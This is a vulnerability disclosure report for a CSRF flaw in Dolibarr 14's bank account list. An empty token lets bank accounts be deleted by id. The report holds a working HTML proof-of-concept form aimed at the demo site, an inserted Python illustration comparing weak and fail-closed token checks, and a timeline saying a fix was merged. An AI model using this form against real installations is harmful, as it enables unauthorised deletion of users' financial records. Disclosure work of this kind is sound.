Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on Jul 21st 2021


✍️ Description

In the Bank section, the Bank | Cash part, you protect deletion of List entities against CSRF attacks, but if I set the CSRF token to nothing then I am able to delete arbitrary List entities only by knowing their ids.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.dolibarr.org/compta/bank/list.php" method="POST">
<input type="hidden" name="token" value="" />
<input type="hidden" name="formfilteraction" value="list" />
<input type="hidden" name="action" value="list" />
<input type="hidden" name="sortfield" value="b&#46;label" />
<input type="hidden" name="sortorder" value="ASC" />
<input type="hidden" name="contextpage" value="bankaccountlist" />
<input type="hidden" name="page" value="0" />
<input type="hidden" name="search&#95;status" value="opened" />
<input type="hidden" name="pageplusoneold" value="1" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="token" value="" />
<input type="hidden" name="confirm" value="yes" />
<input type="hidden" name="search&#95;ref" value="" />
<input type="hidden" name="search&#95;label" value="" />
<input type="hidden" name="search&#95;status" value="opened" />
<input type="hidden" name="selectedfields" value="b&#46;ref&#44;b&#46;label&#44;accountype&#44;b&#46;account&#95;number&#44;b&#46;fk&#95;accountancy&#95;journal&#44;toreconcile&#44;b&#46;datec&#44;b&#46;tms&#44;b&#46;clos&#44;balance&#44;" />
<input type="hidden" name="toselect&#91;&#93;" value="256" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

💥 Impact

This vulnerability is capable of deleting the mentioned List entities from the Tools section. Application version == 14 (tested on the demo website).
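The following is an added illustration, not Dolibarr's code or the reporter's: it parses a trimmed copy of the PoC form above to show what the server actually receives (an empty `token`, `action=delete`, `confirm=yes`, `toselect[]=256`), then contrasts a hypothetical token check with the bug class the report describes (an empty token skips the comparison) against a fail-closed check. The session token value is constructed.

```python
import hmac
from html.parser import HTMLParser

# Constructed, trimmed copy of the PoC form above, keeping its entity-encoded names.
POC_HTML = """<form action="/compta/bank/list.php" method="POST">
<input type="hidden" name="token" value="" />
<input type="hidden" name="action" value="list" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="confirm" value="yes" />
<input type="hidden" name="toselect&#91;&#93;" value="256" />
</form>"""

class HiddenInputCollector(HTMLParser):
    """Collect hidden <input> name/value pairs. HTMLParser decodes attribute
    entities, and a repeated name keeps its last value, as PHP's $_POST does."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name", "")] = a.get("value", "")

def parse_poc(html):
    p = HiddenInputCollector()
    p.feed(html)
    return p.fields

def weak_csrf_check(session_token, posted_token):
    """Hypothetical check showing the bug class in the report: the comparison
    only runs when a token was posted, so an empty token skips it."""
    if posted_token and posted_token != session_token:
        return False
    return True

def strict_csrf_check(session_token, posted_token):
    """Fail closed: missing/empty token is rejected; comparison is constant-time."""
    if not session_token or not posted_token:
        return False
    return hmac.compare_digest(session_token, posted_token)

def delete_would_run(session, fields, check):
    """Simulates the delete branch of the list page: True if deletion proceeds."""
    if fields.get("action") != "delete" or fields.get("confirm") != "yes":
        return False
    return check(session.get("token", ""), fields.get("token", ""))

VICTIM_SESSION = {"token": "c0ffee0123456789c0ffee0123456789"}  # constructed session token
```

With the weak check the PoC's empty token lets the delete branch run; with the fail-closed check the same request is rejected, and only a request carrying the victim's real session token passes.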

We have contacted a member of the dolibarr team and are waiting to hear back (a year ago)
amammad modified the report (a year ago)
Laurent Destailleur confirmed that a fix has been merged on 0749d0 (a year ago)
Laurent Destailleur has been awarded the fix bounty